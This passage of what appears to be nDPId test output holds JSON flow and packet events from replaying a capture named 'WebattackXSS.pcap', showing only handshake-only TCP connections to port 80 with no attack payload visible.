+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4549,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":1,"flow_last_seen":1499347513353,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347513353,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ef1AAD4GS9OsEAABwKgKMuKKAFAHuIUzAAAAAKACchDxNAAAAgQFtAQCCAoBOvzOAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":2,"flow_last_seen":1499347513353,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347513353,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4oqWR\/ViB7iFNKAScSCUQQAAAgQFtAQCCAoD5M5DATr8zgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4551,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":3,"flow_last_seen":1499347513353,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347513353,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ef5AAD4GS9qsEAABwKgKMuKKAFAHuIU0lkf1Y4AQAOUzSQAAAQEICgE6\/M4D5M5D"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347514648,"flow_last_seen":1499347514648,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347514648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58008,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":1,"flow_last_seen":1499347514648,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347514648,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81oFAAD4G706sEAABwKgKMuKYAFBs5yiTAAAAAKACchDnUwAAAgQFtAQCCAoBOv4SAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4562,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":2,"flow_last_seen":1499347514648,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347514648,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4pgH3WT1bOcolKAScSCn9AAAAgQFtAQCCAoD5M+HATr+EgEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4563,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":3,"flow_last_seen":1499347514648,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347514648,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01oJAAD4G71WsEAABwKgKMuKYAFBs5yiUB91k9oAQAOVG\/AAAAQEICgE6\/hID5M+H"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347381694,"flow_last_seen":1499347386722,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347381694,"flow_last_seen":1499347386722,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347384186,"flow_last_seen":1499347389723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56616,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347384186,"flow_last_seen":1499347389723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56616,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347385481,"flow_last_seen":1499347390723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347385481,"flow_last_seen":1499347390723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347386736,"flow_last_seen":1499347392723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56644,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347386736,"flow_last_seen":1499347392723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56644,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347389305,"flow_last_seen":1499347394723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56670,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347389305,"flow_last_seen":1499347394723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56670,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347390580,"flow_last_seen":1499347395724,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56684,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347390580,"flow_last_seen":1499347395724,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56684,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4579,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347517171,"flow_last_seen":1499347517171,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347517171,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4579,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":1,"flow_last_seen":1499347517171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347517171,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8PfRAAD4Gh9ysEAABwKgKMuKyAFAJ1z18AAAAAKACchAy6wAAAgQFtAQCCAoBOwCIAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4580,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":2,"flow_last_seen":1499347517171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347517171,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4rJwyiE5Cdc9faAScSDL4wAAAgQFtAQCCAoD5NH+ATsAiAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4581,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":3,"flow_last_seen":1499347517172,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347517172,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PfVAAD4Gh+OsEAABwKgKMuKyAFAJ1z19cMohOoAQAOVq6gAAAQEICgE7AIkD5NH+"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4591,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347518410,"flow_last_seen":1499347518410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347518410,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58048,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4591,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":1,"flow_last_seen":1499347518410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347518410,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8FGZAAD4GsWqsEAABwKgKMuLAAFAhaxXYAAAAAKACchBBtwAAAgQFtAQCCAoBOwG+AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4592,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":2,"flow_last_seen":1499347518410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347518410,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4sCWVenKIWsV2aAScSDrXAAAAgQFtAQCCAoD5NM0ATsBvgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4593,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":3,"flow_last_seen":1499347518410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347518410,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0FGdAAD4GsXGsEAABwKgKMuLAAFAhaxXZllXpy4AQAOWKZAAAAQEICgE7Ab4D5NM0"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4603,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347519679,"flow_last_seen":1499347519679,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347519679,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4603,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":1,"flow_last_seen":1499347519679,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347519679,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8A+RAAD4GweysEAABwKgKMuLOAFBZkgEfAAAAAKACchAc\/gAAAgQFtAQCCAoBOwL7AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4604,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":2,"flow_last_seen":1499347519679,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347519679,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4s4k\/bw4WZIBIKAScSBkUQAAAgQFtAQCCAoD5NRxATsC+wEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4605,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":3,"flow_last_seen":1499347519680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347519680,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0A+VAAD4GwfOsEAABwKgKMuLOAFBZkgEgJP28OYAQAOUDWAAAAQEICgE7AvwD5NRx"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4621,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347522204,"flow_last_seen":1499347522204,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347522204,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58088,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4621,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":1,"flow_last_seen":1499347522204,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347522204,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8G91AAD4GqfOsEAABwKgKMuLoAFAaMR6uAAAAAKACchA8PgAAAgQFtAQCCAoBOwVzAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":2,"flow_last_seen":1499347522204,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347522204,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4uhHWnn+GjEer6AScSCg9wAAAgQFtAQCCAoD5NboATsFcwEDAwc="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4623,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":3,"flow_last_seen":1499347522205,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347522205,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0G95AAD4GqfqsEAABwKgKMuLoAFAaMR6vR1p5\/4AQAOU\/\/wAAAQEICgE7BXMD5Nbo"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347523488,"flow_last_seen":1499347523488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347523488,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58102,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":1,"flow_last_seen":1499347523488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347523488,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bP1AAD4GWNOsEAABwKgKMuL2AFCTdmpJAAAAAKACchB2DgAAAgQFtAQCCAoBOwa0AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":2,"flow_last_seen":1499347523488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347523488,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4vYacquOk3ZqSqAScSDU3gAAAgQFtAQCCAoD5NgpATsGtAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4635,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":3,"flow_last_seen":1499347523489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347523489,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bP5AAD4GWNqsEAABwKgKMuL2AFCTdmpKGnKrj4AQAOVz5gAAAQEICgE7BrQD5Ngp"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4648,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347524782,"flow_last_seen":1499347524782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347524782,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4648,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":1,"flow_last_seen":1499347524782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347524782,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uUBAAD4GDJCsEAABwKgKMuMEAFAFWr63AAAAAKACchCuawAAAgQFtAQCCAoBOwf3AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4649,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":2,"flow_last_seen":1499347524782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347524782,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4wR+L\/VQBVq+uKAScSBeeAAAAgQFtAQCCAoD5NltATsH9wEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4650,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":3,"flow_last_seen":1499347524783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347524783,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uUFAAD4GDJesEAABwKgKMuMEAFAFWr64fi\/1UYAQAOX9fwAAAQEICgE7B\/cD5Nlt"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4657,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347526155,"flow_last_seen":1499347526155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526155,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4657,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":1,"flow_last_seen":1499347526155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347526155,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vM5AAD4GCQKsEAABwKgKMuMSAFBd27WBAAAAAKACchBdugAAAgQFtAQCCAoBOwlPAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4658,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":2,"flow_last_seen":1499347526155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347526155,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4xLVlk4tXdu1gqAScSBcLAAAAgQFtAQCCAoD5NrEATsJTwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":3,"flow_last_seen":1499347526156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347526156,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vM9AAD4GCQmsEAABwKgKMuMSAFBd27WC1ZZOLoAQAOX7MwAAAQEICgE7CU8D5NrE"} 